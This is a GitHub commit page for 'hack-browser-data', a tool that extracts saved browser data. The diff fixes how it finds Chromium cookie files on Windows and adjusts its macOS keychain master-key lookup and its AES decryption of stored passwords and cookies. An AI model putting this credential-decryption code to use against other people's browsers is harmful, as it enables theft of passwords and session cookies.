Skip to content

Commit

Permalink
Merge pull request #162 from moonD4rk/feat/dev
Browse files Browse the repository at this point in the history
fix: find cookie file failed on windows
  • Loading branch information
moonD4rk authored Aug 16, 2022
2 parents 2863070 + cf4ffec commit 7fe14c0
Show file tree
Hide file tree
Showing 7 changed files with 22 additions and 28 deletions.
2 changes: 2 additions & 0 deletions internal/browser/browser.go
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@ package browser
import (
"os"
"path/filepath"
"sort"
"strings"

"hack-browser-data/internal/browingdata"
Expand Down Expand Up @@ -108,6 +109,7 @@ func ListBrowser() []string {
var l []string
l = append(l, typeutil.Keys(chromiumList)...)
l = append(l, typeutil.Keys(firefoxList)...)
sort.Strings(l)
return l
}

Expand Down
2 changes: 1 addition & 1 deletion internal/browser/browser_windows.go
Original file line number Diff line number Diff line change
Expand Up @@ -96,7 +96,7 @@ var (
braveProfilePath = homeDir + "/AppData/Local/BraveSoftware/Brave-Browser/User Data/Default/"
speed360ProfilePath = homeDir + "/AppData/Local/360chrome/Chrome/User Data/Default/"
qqBrowserProfilePath = homeDir + "/AppData/Local/Tencent/QQBrowser/User Data/Default/"
operaProfilePath = homeDir + "/AppData/Roaming/Opera Software/Opera Stable/Default/"
operaProfilePath = homeDir + "/AppData/Roaming/Opera Software/Opera Stable/"
operaGXProfilePath = homeDir + "/AppData/Roaming/Opera Software/Opera GX Stable/"
vivaldiProfilePath = homeDir + "/AppData/Local/Vivaldi/User Data/Default/"
coccocProfilePath = homeDir + "/AppData/Local/CocCoc/Browser/User Data/Default/"
Expand Down
13 changes: 8 additions & 5 deletions internal/browser/chromium/chromium.go
Original file line number Diff line number Diff line change
Expand Up @@ -124,14 +124,17 @@ func chromiumWalkFunc(items []item.Item, multiItemPaths map[string]map[item.Item
return func(path string, info fs.FileInfo, err error) error {
for _, v := range items {
if info.Name() == v.FileName() {
parentBaseDir := fileutil.ParentBaseDir(path)
if parentBaseDir == "System Profile" {
if strings.Contains(path, "System Profile") {
continue
}
if _, exist := multiItemPaths[parentBaseDir]; exist {
multiItemPaths[parentBaseDir][v] = path
profileFolder := fileutil.ParentBaseDir(path)
if strings.Contains(filepath.ToSlash(path), "/Network/Cookies") {
profileFolder = fileutil.BaseDir(strings.ReplaceAll(filepath.ToSlash(path), "/Network/Cookies", ""))
}
if _, exist := multiItemPaths[profileFolder]; exist {
multiItemPaths[profileFolder][v] = path
} else {
multiItemPaths[parentBaseDir] = map[item.Item]string{v: path}
multiItemPaths[profileFolder] = map[item.Item]string{v: path}
}
}
}
Expand Down
10 changes: 5 additions & 5 deletions internal/browser/chromium/chromium_darwin.go
Original file line number Diff line number Diff line change
Expand Up @@ -17,8 +17,8 @@ import (
)

var (
ErrWrongSecurityCommand = errors.New("macOS wrong security command")
ErrCouldNotFindInKeychain = errors.New("macOS could not find in keychain")
errWrongSecurityCommand = errors.New("wrong security command")
errCouldNotFindInKeychain = errors.New("could not be find in keychain")
)

func (c *chromium) GetMasterKey() ([]byte, error) {
Expand All @@ -39,19 +39,19 @@ func (c *chromium) GetMasterKey() ([]byte, error) {
}
if stderr.Len() > 0 {
if strings.Contains(stderr.String(), "could not be found") {
return nil, ErrCouldNotFindInKeychain
return nil, errCouldNotFindInKeychain
}
return nil, errors.New(stderr.String())
}
chromeSecret := bytes.TrimSpace(stdout.Bytes())
if chromeSecret == nil {
return nil, ErrWrongSecurityCommand
return nil, errWrongSecurityCommand
}
chromeSalt := []byte("saltysalt")
// @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New)
if key == nil {
return nil, ErrWrongSecurityCommand
return nil, errWrongSecurityCommand
}
c.masterKey = key
log.Infof("%s initialized master key success", c.name)
Expand Down
13 changes: 2 additions & 11 deletions internal/decrypter/decrypter_darwin.go
Original file line number Diff line number Diff line change
@@ -1,20 +1,11 @@
package decrypter

import (
"errors"
)
//go:build darwin

var (
errSecurityKeyIsEmpty = errors.New("input [security find-generic-password -wa 'Chrome'] in terminal")
)
package decrypter

func Chromium(key, encryptPass []byte) ([]byte, error) {
if len(encryptPass) <= 3 {
return nil, errPasswordIsEmpty
}
if len(key) == 0 {
return nil, errSecurityKeyIsEmpty
}

iv := []byte{32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32}
return aes128CBCDecrypt(key, iv, encryptPass[3:])
Expand Down
2 changes: 2 additions & 0 deletions internal/decrypter/decrypter_linux.go
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
//go:build linux

package decrypter

func Chromium(key, encryptPass []byte) ([]byte, error) {
Expand Down
8 changes: 2 additions & 6 deletions internal/decrypter/decrypter_windows.go
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
//go:build windows

package decrypter

import (
Expand All @@ -11,9 +13,6 @@ func Chromium(key, encryptPass []byte) ([]byte, error) {
if len(encryptPass) < 3 {
return nil, errPasswordIsEmpty
}
if len(key) == 0 {
return nil, errSecurityKeyIsEmpty
}

return aesGCMDecrypt(encryptPass[15:], key, encryptPass[3:15])
}
Expand All @@ -22,9 +21,6 @@ func ChromiumForYandex(key, encryptPass []byte) ([]byte, error) {
if len(encryptPass) < 3 {
return nil, errPasswordIsEmpty
}
if len(key) == 0 {
return nil, errSecurityKeyIsEmpty
}
// remove Prefix 'v10'
// gcmBlockSize = 16
// gcmTagSize = 16
Expand Down

0 comments on commit 7fe14c0

Please sign in to comment.